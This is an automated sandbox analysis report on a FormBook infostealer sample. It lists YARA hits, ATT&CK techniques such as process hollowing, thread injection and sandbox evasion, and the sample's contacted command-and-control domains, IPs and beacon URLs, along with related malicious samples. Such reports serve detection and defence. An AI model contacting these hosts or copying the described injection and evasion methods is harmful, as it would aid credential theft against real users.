          Source: C:\Users\user\Desktop\NvkGETsSDb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 510425 Sample: NvkGETsSDb.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 7 other signatures 2->42 10 NvkGETsSDb.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...28vkGETsSDb.exe.log, ASCII 10->28 dropped 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Injects a PE file into a foreign processes 10->58 14 NvkGETsSDb.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 carterscts.com 198.46.90.29, 49799, 80 INMOTI-1US United States 17->30 32 mr-exclusive.com 184.168.131.241, 49808, 80 AS-26496-GO-DADDY-COM-LLCUS United States 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses ipconfig to lookup or modify the Windows network settings 17->46 21 ipconfig.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NvkGETsSDb.exe15%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.NvkGETsSDb.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.NvkGETsSDb.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.NvkGETsSDb.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.NvkGETsSDb.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mr-exclusive.com/s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv0%Avira URL Cloudsafe
          http://www.carterscts.com/s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv0%Avira URL Cloudsafe
          www.agentpathleurre.space/s18y/0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mr-exclusive.com
          184.168.131.241
          truetrue
            unknown
            carterscts.com
            198.46.90.29
            truetrue
              unknown
              www.lenovoidc.com
              unknown
              unknowntrue
                unknown
                www.mr-exclusive.com
                unknown
                unknowntrue
                  unknown
                  www.carterscts.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.mr-exclusive.com/s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZvtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.carterscts.com/s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZvtrue
                    • Avira URL Cloud: safe
                    unknown
                    www.agentpathleurre.space/s18y/true
                    • Avira URL Cloud: safe
                    low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_ipconfig.exe, 00000010.00000002.519067627.000000000358F000.00000004.00020000.sdmpfalse
                      high
                      http://www.collada.org/2005/11/COLLADASchema9DoneNvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      184.168.131.241
                      mr-exclusive.comUnited States
                      26496AS-26496-GO-DADDY-COM-LLCUStrue
                      198.46.90.29
                      carterscts.comUnited States
                      54641INMOTI-1UStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:510425
                      Start date:27.10.2021
                      Start time:19:35:13
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:NvkGETsSDb.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@7/1@3/3
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 56.1% (good quality ratio 52.5%)
                      • Quality average: 72.6%
                      • Quality standard deviation: 30.1%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 66
                      • Number of non-executed functions: 137
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 93.184.220.29, 20.199.120.151, 20.49.157.6, 20.199.120.182, 20.199.120.85, 40.112.88.60, 80.67.82.242, 80.67.82.235, 204.79.197.200, 13.107.21.200, 20.82.210.154
                      • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      19:36:14API Interceptor1x Sleep call for process: NvkGETsSDb.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      184.168.131.241AWB#708900271021,PDF.exeGet hashmaliciousBrowse
                      • www.boney4districtb.com/r2j4/?StNH=9r_X3ZFHtftXupP&UBj4d=LFAiXYmTCBeaiZVkmnENbyVkuv8MJYAEPmtNc8t5EMgtzVldrMk49PHJW+dEvs3sanQW
                      _Payment Advise.docGet hashmaliciousBrowse
                      • www.mckinneysfinest.com/k8u7/?gxo8Eb=stx06pLxG2uhHt&sRGLI=1bPiF0ymqUrevqPd4b9E+KBaEtHs6PvOSmp56O1TuFjTMCdLZCrwRu1kAfrIR9Q7KIC8fA==
                      PO03214890.exeGet hashmaliciousBrowse
                      • www.soulshine.today/rgv6/?I6bdp0F=WOgTlg0CsEDUEOPolUd3k4KrX1bkYNUSVHt3Voxul06FzSdhm4lRQ5zn06mtwv+q2ZPBPfPQRA==&uN90=Wv0xlDNhhL
                      8A1A2kc6oG.exeGet hashmaliciousBrowse
                      • www.voteyatooma.com/fkt8/?tZg=GtK4AtM022&CrX=ofUS4x3nAebXS2gtlT7bCxF16YnqpMIcDxownTpTVGIuSS8RbFZpuU5Akchb7PYnpNHErMlOzQ==
                      Dekont_20211910_Halbank.exeGet hashmaliciousBrowse
                      • www.royzoom.com/gab8/?NT3PVbt=ZIawR5WfQNh0tP8w4y/ZuRppdufcVyCLEE56Lf8Rl/+sRJFnSkjsI6Qg2BPlTh8S00GI&Z0DX=Ozr8Ub4PIpQTxx
                      aOThyqtdnKntCHP.exeGet hashmaliciousBrowse
                      • www.dunedinhyperlocal.com/u4an/?8p=QzQ5ef7S9XxyRV9FzLuAV3Nyo+3E4vM7eDSIUEhkPsMNsjJnUVEtYk+AmU1/T2IyDvv2d6Or5g==&m2Mpy=4hoLs8sX9d
                      EvxSSUyNfJ.exeGet hashmaliciousBrowse
                      • www.crgcatherine.com/ed9s/?r2Jt_Nb=lkqAHEYv8Zhi7fgrvevu0+VWnA2QaRYdkwf/BKiZqTsQIANP75p6RpBVhevD4imC+4UX&2d=B2JdPjgh
                      triage_dropped_file.exeGet hashmaliciousBrowse
                      • www.hillcresthomegroup.com/fqiq/?oJE=e8IUz+kwT1xqAO5a7dDPCxDZEZgLUw6RtmSKZk1zt2cQgLHUKUCbR0r9TDFhVb4eVEB6&u6KLb=Wp6xUr6h5
                      FzvFtf2XXK.exeGet hashmaliciousBrowse
                      • www.sunshinefamilysupport.com/b2c0/?7nwTnlOP=OHhY/R7Pi7l9OOhmJJK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFJSTx4r5BI+0&yHY8=LDH0Pf4X32D4h
                      REQ2021102862448032073.exeGet hashmaliciousBrowse
                      • www.royzoom.com/gab8/?s48DIz=ZIawR5WfQNh0tP8w4y/ZuRppdufcVyCLEE56Lf8Rl/+sRJFnSkjsI6Qg2Cv1cAsqqRvP&u2=3fo4s8O0
                      jjBv8SpZXm.exeGet hashmaliciousBrowse
                      • www.avachaturbate.com/merc/?o67T=4TgGASrpG4NKs6fUTtEcg+jBUQzM4DK+NTe2Wif+5fnmqwYoqXUOY0xuCl11FpRRnfjB&V8=VfRPdzpxb4pXml
                      PURCHASE ORDER.docGet hashmaliciousBrowse
                      • www.4346emerald.com/ed9s/?3f8=4FJV/9v6vDki4c21a5N90qkBdO4moNaH31u52SaxnSM3kgwCG5H+93GFyEYXEd492VfcKw==&9rKXL=T2JtB4vhllhha2
                      Scan_202005.exeGet hashmaliciousBrowse
                      • www.uperionorthamerica.com/pfrp/?PX=4hD0VrfPzva&0HQ=XNgnKB9mKucGSZ8xF6uYha143jCut8oDi/mwkVenOaidzNCLjJufmPtr+aig6m5szVrzgj/7tA==
                      Lv9eznkydx.exeGet hashmaliciousBrowse
                      • cloudkiss.net/index.php
                      PO.exeGet hashmaliciousBrowse
                      • www.annotake.com/odse/?yV4DLTZ=DNEOORvJOpIlxzI1Ce3DiLTsHhO7HE2vhB8+VMP16POjOpH2kdX3F5WxV/E/FzaUR6ROSWAzkw==&2d=AdrxUv8x
                      Contract 20123.xlsxGet hashmaliciousBrowse
                      • www.foxyladynails.com/scb0/?9ra=CGto01zpETy1wfVoDXG+ZhJsaDV0+AaThApfSytOfvXIKJYrj/MmsJyuEoGCVCFDrTIVqw==&e8whC=zxoxTPdPU
                      OXkB3xMeAr.exeGet hashmaliciousBrowse
                      • www.thursdaynightthriller.com/nk6l/?WDKHz8DP=AN7S2hjzcv8Gc4uLzN77TguLKoDYI21oeP+/6IjuWfZR4q7OI4m7rj64+wbHO5lIW+km&3f3H7J=F48x3ps
                      devis.exeGet hashmaliciousBrowse
                      • www.mississippiscorecard.com/s3dy/?n6Al5z7=atIJKMh/Nf1NytC3eVMa1G/pJNMMD998UDoVneC8L7BXz/kf7GlY/rbrOCQYh/uS11gd&4h=8phDpf6PHDn
                      2WK7SGkGVZ.exeGet hashmaliciousBrowse
                      • www.sunshinefamilysupport.com/b2c0/?7nlpd=OHhY/R7Pi7l9OOhmJJK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFJSTx4r5BI+0&_xllR=SL0l7NVxUdmdjv
                      5v6RwaCMPI.exeGet hashmaliciousBrowse
                      • www.groupninemed.com/noha/?T8PhURl=lvCRxprl/4VR5AH+cYxnjQze0QPiFV0jDZjzPWMdHMoixCNRtg260CKerfKoVKuB1UPz&n0D0K=xDKPRVRherJ0

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AS-26496-GO-DADDY-COM-LLCUSAWB#708900271021,PDF.exeGet hashmaliciousBrowse
                      • 184.168.131.241
                      2jFfKOEefN.exeGet hashmaliciousBrowse
                      • 72.167.241.180
                      jGK42jrs2j.exeGet hashmaliciousBrowse
                      • 72.167.78.83
                      PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                      • 182.50.132.92
                      PMYIIWQ10054.pdf.vbsGet hashmaliciousBrowse
                      • 107.180.48.126
                      Order of CB-15GL PO530_pdf.exeGet hashmaliciousBrowse
                      • 72.167.241.180
                      Lebanon Khayat Trading Company.exeGet hashmaliciousBrowse
                      • 182.50.132.92
                      DRAFT CONTRACT 0000499000-1100928777-pdf.exeGet hashmaliciousBrowse
                      • 173.201.185.67
                      Swift copy.exeGet hashmaliciousBrowse
                      • 182.50.132.92
                      ATGSVCN64670.pdf.vbsGet hashmaliciousBrowse
                      • 107.180.48.126
                      ACUEAQN44306.pdf.vbsGet hashmaliciousBrowse
                      • 107.180.48.126
                      BYWDAMU4436.vbsGet hashmaliciousBrowse
                      • 107.180.48.126
                      F9ObnUc4ol.exeGet hashmaliciousBrowse
                      • 50.62.168.3
                      _Payment Advise.docGet hashmaliciousBrowse
                      • 184.168.131.241
                      Q-700004637 1004913.exeGet hashmaliciousBrowse
                      • 107.180.56.180
                      SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                      • 173.201.181.36
                      uu5009125.exeGet hashmaliciousBrowse
                      • 208.109.9.44
                      ATT12068.htmlGet hashmaliciousBrowse
                      • 107.180.27.238
                      REMITTANCE-54324.exeGet hashmaliciousBrowse
                      • 107.180.56.180
                      ABONOF2201.exeGet hashmaliciousBrowse
                      • 107.180.56.180
                      INMOTI-1USiAcd5qX0Zb.exeGet hashmaliciousBrowse
                      • 198.46.90.29
                      Details OF Payment.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      aD74smrP3Q.exeGet hashmaliciousBrowse
                      • 198.46.90.29
                      70654 SSEBACT.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      987421.exeGet hashmaliciousBrowse
                      • 173.231.223.186
                      70654 SSEBACT.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      70654 SSEBACT.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      BANKING INFORMATION.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      Angebot Anfrage Maschinensucher YOM.exeGet hashmaliciousBrowse
                      • 173.205.124.65
                      COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      SecuriteInfo.com.__vbaHresultCheckObj.9268.exeGet hashmaliciousBrowse
                      • 104.247.76.214
                      TRANSFER REQUEST FORM.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      TRANSFER REQUEST FORM.exeGet hashmaliciousBrowse
                      • 104.193.142.174
                      Equiniti.AP Summary.3405.htmlGet hashmaliciousBrowse
                      • 173.231.220.228
                      ugsuHxq7Ey.exeGet hashmaliciousBrowse
                      • 209.182.206.86
                      waff.xlsGet hashmaliciousBrowse
                      • 173.231.245.32
                      QOJ48GT1(09-17-2021).vbsGet hashmaliciousBrowse
                      • 199.250.202.192
                      QJfoKgzkov.exeGet hashmaliciousBrowse
                      • 199.250.199.190
                      orderDetails.xlsxGet hashmaliciousBrowse
                      • 199.250.194.93

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NvkGETsSDb.exe.log
                      Process:C:\Users\user\Desktop\NvkGETsSDb.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.355304211458859
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.723899910809643
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:NvkGETsSDb.exe
                      File size:533504
                      MD5:e17b528f9c192653dc9777bd46e48d82
                      SHA1:f4dfc93942ed0c091340057f1164b1e1e6f4a148
                      SHA256:83708560ecc442b5b6dadbdf5af39ae4f1e843664c932a9de3eff1e38bf6d4a5
                      SHA512:d041efc3a98c8fc690841669f3e9722c43bbee4c6eac7191056b7dff5b8c27d938bf9f7de3409f27239cadf46c70696c12a9c98e86f772339e902b295060ae29
                      SSDEEP:12288:ouQwyxAyhGdds0/v8mEMRp9LviDdzs/4cuKr:LyAL/vVRfl
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...qzya..............0.............:8... ...@....@.. ....................................@................................

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x48383a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x61797A71 [Wed Oct 27 16:12:33 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
